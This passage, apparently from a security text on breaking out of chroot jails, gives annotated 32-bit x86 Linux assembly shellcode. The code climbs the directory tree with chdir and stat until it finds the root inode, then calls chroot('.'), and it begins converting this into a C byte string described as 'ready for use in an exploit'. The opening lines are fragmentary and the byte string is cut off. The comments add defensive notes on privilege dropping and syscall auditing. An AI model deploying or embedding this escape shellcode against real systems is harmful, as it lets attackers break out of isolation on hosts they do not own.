
10 movw $0x01ed, %cx
11
12
leal 0x27(%edx), %eax
13 int $0x80
14
15
leal 61(%edx), %eax
16 int $0x80
17
18
xorl %esi, %esi
19
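/*
 * Directory-climbing loop (32-bit x86 Linux, AT&T syntax, int $0x80 calls).
 * The printed listing's gutter numbers were fused into the code by
 * extraction and "je hacked" / "jl loop" had lost their spaces; the
 * instructions themselves are unchanged.
 *
 * Each pass does chdir(".."), then stat("."), then compares the dword at
 * offset 4 of the stat buffer with 2.  A match jumps to hacked; otherwise
 * the pass counter is bumped and the loop repeats while it is below 0x64.
 *
 * Register roles as used here:
 *   %edx  assumed to be 0 (set outside this excerpt; the byte listing that
 *         follows opens with an xorl on %edx).  It supplies the string
 *         terminators and is the base for every "leal N(%edx), %eax".
 *   %esi  pass counter, zeroed by the xorl just before the label.
 *   %ebx  first syscall argument: pointer to the path built on the stack.
 *   %ecx  second syscall argument: pointer to the 88-byte stat buffer.
 *
 * Notes for the reader:
 *   - No syscall result in %eax is ever checked.
 *   - Nothing pushed here is popped, so each pass leaves 102 bytes behind
 *     on the stack (up to roughly 10 KB over 100 passes).
 *   - Offset 4 is presumably st_ino in the i386 struct stat, and inode 2 is
 *     the usual root-directory inode on ext2-family filesystems; other
 *     filesystems number their root differently, in which case the test
 *     never matches and the loop simply runs out.
 *   - When the counter reaches 0x64 the jl is not taken and execution falls
 *     through to hacked anyway.
 */
loop:
        pushl   %edx                    # zero dword: terminator for the string below
        pushw   $0x2e2e                 # the two bytes ".."
        movl    %esp, %ebx              # ebx -> "..\0"

        leal    12(%edx), %eax          # eax = 12, chdir on i386 (relies on edx == 0)
        int     $0x80                   # chdir("..")

        pushl   %edx                    # zero dword again, for the next string
        push    $0x2e                   # "." (the 32-bit push zero-fills the rest)
        movl    %esp, %ebx              # ebx -> ".\0"

        subl    $88, %esp               # reserve the stat buffer
        movl    %esp, %ecx              # ecx -> buffer

        leal    106(%edx), %eax         # eax = 106, stat on i386
        int     $0x80                   # stat(".", buffer)

        movl    0x4(%ecx), %edi         # dword at buffer+4 (presumably st_ino)
        cmpl    $0x2, %edi              # is the current directory inode 2?
        je      hacked

        incl    %esi                    # one more level tried
        cmpl    $0x64, %esi             # give up after 100 levels
        jl      loop
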
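/*
 * Final step: chroot(".") on whatever directory the climb stopped in.
 * Reached either from the "je hacked" in the loop or by falling through
 * when the loop counter runs out, so the call is made in both cases.
 * The gutter numbers fused into the code by extraction are dropped; the
 * instructions are unchanged.
 *
 * Assumes %edx is still 0, as in the rest of the listing.  The result of
 * the call is not checked, and the excerpt shows no instruction after it.
 *
 * Defensive reading: chroot(2) is refused unless the caller is privileged
 * (CAP_SYS_CHROOT on Linux), so a jailed service that has dropped root
 * before it touches untrusted input cannot complete this step.  A chroot
 * call from a long-running network service is also unusual enough to be
 * worth alerting on through syscall auditing.
 */
hacked:
        pushl   %edx                    # zero dword: string terminator
        push    $0x2e                   # "."
        movl    %esp, %ebx              # ebx -> ".\0"

        leal    61(%edx), %eax          # eax = 61, chroot on i386
        int     $0x80                   # chroot(".")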
Lastly, converted to bytecode and ready for use in an exploit, the code looks like the
following:
1 const char neo_chroot[] =
2 "\x31\xd2" /* xorl %edx, ...